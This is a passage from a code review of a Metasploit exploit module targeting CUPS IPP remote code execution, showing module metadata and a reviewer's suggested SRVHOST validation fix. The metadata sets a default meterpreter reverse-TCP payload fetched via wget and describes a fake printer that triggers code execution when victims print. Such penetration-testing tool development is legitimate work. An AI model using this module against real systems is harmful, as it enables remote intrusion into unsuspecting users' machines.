modules/exploits/multi/misc/cups_ipp_remote_code_execution.rb

```diff
@@ -0,0 +1,607 @@
+          ['URL', 'https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8'],
+          # The libcupsfilters GitHub security advisory
+          ['URL', 'https://github.com/OpenPrinting/libcupsfilters/security/advisories/GHSA-w63j-6g73-wmg5'],
+          # The libppd GitHub security advisory
+          ['URL', 'https://github.com/OpenPrinting/libppd/security/advisories/GHSA-7xfx-47qg-grp6'],
+          # The cups-filters GitHub security advisory
+          ['URL', 'https://github.com/OpenPrinting/cups-filters/security/advisories/GHSA-p9rh-jxmq-gq47'],
+          # The IPP server implementation this module is based on
+          ['URL', 'https://github.com/h2g2bob/ipp-server/']
+        ],
+        # Executes as 'lp' on most Linux distributions
+        'Privileged' => false,
+        'Targets' => [['Default', {}]],
+        'Platform' => %w[linux unix],
+        'Arch' => [ARCH_CMD],
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
+          'FETCH_COMMAND' => 'WGET',
+          'RPORT' => 443,
+          'SSL' => true,
+          'FETCH_WRITABLE_DIR' => '/var/tmp',
+          # Three hours by default, but can be modified for longer or shorter listening periods
+          'WfsDelay' => 10_800
+        },
+        'Actions' => [
+          ['Service', { 'Description' => 'Run mDNS service' }]
+        ],
+        'PassiveActions' => [
+          'Service'
+        ],
+        'DefaultAction' => 'Service',
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2024-09-26',
+        'Notes' => {
+          # There's a small chance the fake printer may flag as "broken" after one execution
+          # If this happens, other victims on the LAN will still be susceptible to code execution
+          # However, this *shouldn't* happen :)
+          'Stability' => [CRASH_SAFE],
+          # Requires a user to send a print job to the malicious printer to trigger RCE
+          'Reliability' => [EVENT_DEPENDENT],
+          'SideEffects' => [
+            # /var/log/cups/error_log will likely contain the payload, IPP server details, and printer name
+            # /var/log/cups/access_log will contain the IPP server details and printer name
+            IOC_IN_LOGS,
+            # The /tmp directory will likely contain a file called "foomatic-" + five random characters
+            # This file is a PDF owned by 'lp', and it's the content that the victim user tried to print
+            ARTIFACTS_ON_DISK
+          ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('PrinterName', [true, 'The printer name', 'PrintToPDF']),
+        OptAddress.new('SRVHOST', [true, 'The local host to listen on (cannot be 0.0.0.0)']),
+        OptPort.new('SRVPORT', [true, 'The local port for the IPP service', 7575])
+      ]
+    )
+  end
+
+  #
+  # Wrapper for service execution and cleanup
+  #
+  def exploit
+    if datastore['SRVHOST'] == '0.0.0.0'
```

Comment:
This check is a bit more robust as it'll also handle IPv6 addresses that are not routable. I copied this from the JNDI Injection mixin we used for exploiting Log4Shell when we needed the address to be something the target can connect to.
```suggestion
    if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0
      fail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.')
```